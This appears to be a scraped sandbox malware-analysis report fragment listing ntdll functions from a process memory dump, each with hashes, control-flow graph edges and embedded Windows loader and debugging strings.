                                                                                                    • Opcode ID: 7829edadd85e06f6754b14c1089c9f6c8a61e0d7bf56506f5e7f87c306e0aa62
                                                                                                    • Instruction ID: a53921d17cc6c1a6677913ae18d38f1b9ac0f0ead76e5ce24aac7803d8b0d992
                                                                                                    • Opcode Fuzzy Hash: 7829edadd85e06f6754b14c1089c9f6c8a61e0d7bf56506f5e7f87c306e0aa62
                                                                                                    • Instruction Fuzzy Hash: FD90023560550406D101715C4514B0A100547D0201FA5C411B0424528D8799CA5179A2
                                                                                                    Function 1A342B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4 1a342b60-1a342b6c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ca239f093b5d2024e758a6e5810d08bc260827cc42ed1704b0f40c743cd3f14e
                                                                                                    • Instruction ID: 342ae2b0a2aa613d8e36d61a03e9c724d17baf036a83f2223952daa264d93d05
                                                                                                    • Opcode Fuzzy Hash: ca239f093b5d2024e758a6e5810d08bc260827cc42ed1704b0f40c743cd3f14e
                                                                                                    • Instruction Fuzzy Hash: 36900265202400074106715C4414B1A400A47E0201B95C021F1014550DC529C9917525
                                                                                                    Function 1A342C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5 1a342c70-1a342c7c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 27afb1a39594b88fd8ddf5b17b765ba88f2d85ea40b940ca7625fb74f22e2cfa
                                                                                                    • Instruction ID: e7ef35f242980e52ccf4b4b74ba0e3bde4e1edd04a7b0861139e0ae295c16bf8
                                                                                                    • Opcode Fuzzy Hash: 27afb1a39594b88fd8ddf5b17b765ba88f2d85ea40b940ca7625fb74f22e2cfa
                                                                                                    • Instruction Fuzzy Hash: 2390023520148806D111715C8404B4E000547D0301F99C411B4424618D8699C9917521
                                                                                                    Function 1A342DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 6 1a342df0-1a342dfc LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 91e999e14d48227ec83fd15b3fd128d61bb8f9d1e18f345588cb8c8280dfc963
                                                                                                    • Instruction ID: 40cf605afe53607349365acb2399f7df1fc1a2a4341f72eeb53225591b468fdd
                                                                                                    • Opcode Fuzzy Hash: 91e999e14d48227ec83fd15b3fd128d61bb8f9d1e18f345588cb8c8280dfc963
                                                                                                    • Instruction Fuzzy Hash: 0690023520140417D112715C4504B0B000947D0241FD5C412B0424518D965ACA52B521
                                                                                                    Function 1A342C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 1a342c0a-1a342c0f 1 1a342c11-1a342c18 0->1 2 1a342c1f-1a342c26 LdrInitializeThunk 0->2
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 04e6f985d3a6ac97bd680c0952557d3511194679cae72ca79e54a92397c7b0b2
                                                                                                    • Instruction ID: aa2e3997c2e0335373a16d0219ccfe38e1cb3f0f4befc6c7b06b50b1054df784
                                                                                                    • Opcode Fuzzy Hash: 04e6f985d3a6ac97bd680c0952557d3511194679cae72ca79e54a92397c7b0b2
                                                                                                    • Instruction Fuzzy Hash: 49B09B719055C5C9D641E7644608B1B794067D0701F65C162F2030641E477CC5D1F575

                                                                                                    Non-executed Functions

                                                                                                    Function 00402870 Relevance: 7.8, Strings: 6, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000001.2320930525.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <$VUUU$^$gfff$gfff$yxxx
                                                                                                    • API String ID: 0-316815425
                                                                                                    • Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
                                                                                                    • Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44
                                                                                                    Function 1A337630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1301 1a337630-1a337651 1302 1a337653-1a33766f call 1a30e660 1301->1302 1303 1a33768b-1a337699 call 1a344c30 1301->1303 1308 1a337675-1a337682 1302->1308 1309 1a374638 1302->1309 1310 1a337684 1308->1310 1311 1a33769a-1a3376a9 call 1a337818 1308->1311 1312 1a37463f-1a374645 1309->1312 1310->1303 1317 1a337701-1a33770a 1311->1317 1318 1a3376ab-1a3376c1 call 1a3377cd 1311->1318 1314 1a3376c7-1a3376d0 call 1a337728 1312->1314 1315 1a37464b-1a3746b8 call 1a38f290 call 1a349020 BaseQueryModuleData 1312->1315 1314->1317 1326 1a3376d2 1314->1326 1315->1314 1338 1a3746be-1a3746c6 1315->1338 1324 1a3376d8-1a3376e1 1317->1324 1318->1312 1318->1314 1328 1a3376e3-1a3376f2 call 1a33771b 1324->1328 1329 1a33770c-1a33770e 1324->1329 1326->1324 1330 1a3376f4-1a3376f6 1328->1330 1329->1330 1334 1a337710-1a337719 1330->1334 1335 1a3376f8-1a3376fa 1330->1335 1334->1335 1335->1310 1337 1a3376fc 1335->1337 1339 1a3747be-1a3747d0 call 1a342c50 1337->1339 1338->1314 1341 1a3746cc-1a3746d3 1338->1341 1339->1310 1341->1314 1343 1a3746d9-1a3746e4 1341->1343 1344 1a3746ea-1a374723 call 1a38f290 call 1a34aaa0 1343->1344 1345 1a3747b9 call 1a344d48 1343->1345 1351 1a374725-1a374736 call 1a38f290 1344->1351 1352 1a37473b-1a37476b call 1a38f290 1344->1352 1345->1339 1351->1317 1352->1314 1357 1a374771-1a37477f call 1a34a770 1352->1357 1360 1a374786-1a3747a3 call 1a38f290 call 1a37cf9e 1357->1360 1361 1a374781-1a374783 1357->1361 1360->1314 1366 1a3747a9-1a3747b2 1360->1366 1361->1360 1366->1357 1367 1a3747b4 1366->1367 1367->1314
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1A374787
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1A374725
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1A374742
                                                                                                    • ExecuteOptions, xrefs: 1A3746A0
                                                                                                    • Execute=1, xrefs: 1A374713
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1A374655
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1A3746FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: e1279a2c4849265f9f95be953d19c383a66b0756cf3fdf05ff24a269afd1b993
                                                                                                    • Instruction ID: dddf0c66d095448d491640eb578d23abb6488353111806b4f7989d9f08efa027
                                                                                                    • Opcode Fuzzy Hash: e1279a2c4849265f9f95be953d19c383a66b0756cf3fdf05ff24a269afd1b993
                                                                                                    • Instruction Fuzzy Hash: E9512675A0425D7BDB12DBA5DC95FEA73ACEF08301F1101AAE604E7192E730AE81CF50
                                                                                                    Function 1A32F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1A3702BD
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1A3702E7
                                                                                                    • RTL: Re-Waiting, xrefs: 1A37031E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                    • API String ID: 0-2474120054
                                                                                                    • Opcode ID: 2d8f0a90855830b3338ce60200eaeb47f6fc3bbc000eb9c9143c4780b47f86f7
                                                                                                    • Instruction ID: 43ea330d8b1066f6a2072a75b929252c9f245d0470f62ddc4288b379797950fa
                                                                                                    • Opcode Fuzzy Hash: 2d8f0a90855830b3338ce60200eaeb47f6fc3bbc000eb9c9143c4780b47f86f7
                                                                                                    • Instruction Fuzzy Hash: E1E1AC356087429FE721CF68C880B1AB7E4AB85724F500B1EF5A58B2E1D779E954CB42
                                                                                                    Function 1A33BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Resource at %p, xrefs: 1A377B8E
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1A377B7F
                                                                                                    • RTL: Re-Waiting, xrefs: 1A377BAC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 0-871070163
                                                                                                    • Opcode ID: 71e703b82d51eab6d3ed554e7e8a91f5a6dca711c11200a4a92c6f8e56346294
                                                                                                    • Instruction ID: 3b49ad32e5c216a6d5f64454a18e9e1503342777452ee445ba947aaccd7f9f1b
                                                                                                    • Opcode Fuzzy Hash: 71e703b82d51eab6d3ed554e7e8a91f5a6dca711c11200a4a92c6f8e56346294
                                                                                                    • Instruction Fuzzy Hash: 4141D0357047469FC725CE25D840B5AB7E5EF88721F110A1EF99ADB280DB30E405CB91
                                                                                                    Function 1A33B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1A37728C
                                                                                                    Strings
                                                                                                    • RTL: Resource at %p, xrefs: 1A3772A3
                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1A377294
                                                                                                    • RTL: Re-Waiting, xrefs: 1A3772C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-605551621
                                                                                                    • Opcode ID: 0795c91a093c6ef47a02f97bcb4ac317e993e57108838548dfab2cd3d1600d06
                                                                                                    • Instruction ID: 6ab4f3d02f63277ea3041e86a3558b047b2ce277b36f120283bebb85cd3c50b2
                                                                                                    • Opcode Fuzzy Hash: 0795c91a093c6ef47a02f97bcb4ac317e993e57108838548dfab2cd3d1600d06
                                                                                                    • Instruction Fuzzy Hash: B4411D35704246ABC716CE64DC41F5AB7A5FF88321F110B1AF9A4AB680DB24FC42CBD1
                                                                                                    Function 1A347D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-
                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction ID: 0748c255af16f8db932fd276e3423e662c62ea589b4163afea0a0c80209778bf
                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction Fuzzy Hash: 2C918F70E1021AABDB16CE69C881BAEB7E5FF45720F71471BE955E72C0E7309981CB60
                                                                                                    Function 1A309126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$@
                                                                                                    • API String ID: 0-1194432280
                                                                                                    • Opcode ID: 5a6c953a180655cf7cd519c4d0720c5f0aebd5e92b53dcc7a7de75e7ec6e05ce
                                                                                                    • Instruction ID: 89f36c72e1c48e4db71e99d045bf9be72a9ab53e82c7fd23e8f4c5cb77e56f88
                                                                                                    • Opcode Fuzzy Hash: 5a6c953a180655cf7cd519c4d0720c5f0aebd5e92b53dcc7a7de75e7ec6e05ce
                                                                                                    • Instruction Fuzzy Hash: D5811775D012699BDB258BA4CD44BDEB6B8AF48710F0141EAE90DF7280E7709E85CFA0